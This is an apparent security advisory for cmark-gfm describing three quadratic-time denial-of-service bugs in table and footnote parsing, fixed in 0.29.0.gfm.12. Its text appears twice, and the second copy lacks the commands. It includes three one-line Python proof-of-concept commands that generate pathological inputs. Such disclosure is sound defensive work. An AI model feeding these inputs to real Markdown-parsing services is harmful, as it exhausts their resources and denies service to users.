Impact
Three polynomial time complexity issues in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service.
Proof of concept
Issue 1:
python3 -c 'n = 10000; print("|" + "x|" * n + "\n|" + "-|" * n)' | cmark-gfm -e tableIssue 2:
python3 -c 'n = 10000; print("|" + "x|" * n + "\n|" + "-|" * n + "\n" + "a\n" * n)' | cmark-gfm -e tableIssue 3:
python3 -c 'n = 10000; print("[^1]:" * n + "\n" * n)' | cmark-gfm -e footnotesIncreasing the number 10000 in the above commands causes the running time to increase quadratically.
Patches
These vulnerabilities have been patched in 0.29.0.gfm.12.
References
For more information
If you have any questions or comments about this advisory:
kevinbackhouse Finder
Impact
Three polynomial time complexity issues in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service.
Proof of concept
Issue 1:
Issue 2:
Issue 3:
Increasing the number 10000 in the above commands causes the running time to increase quadratically.
Patches
These vulnerabilities have been patched in 0.29.0.gfm.12.
References
For more information
If you have any questions or comments about this advisory: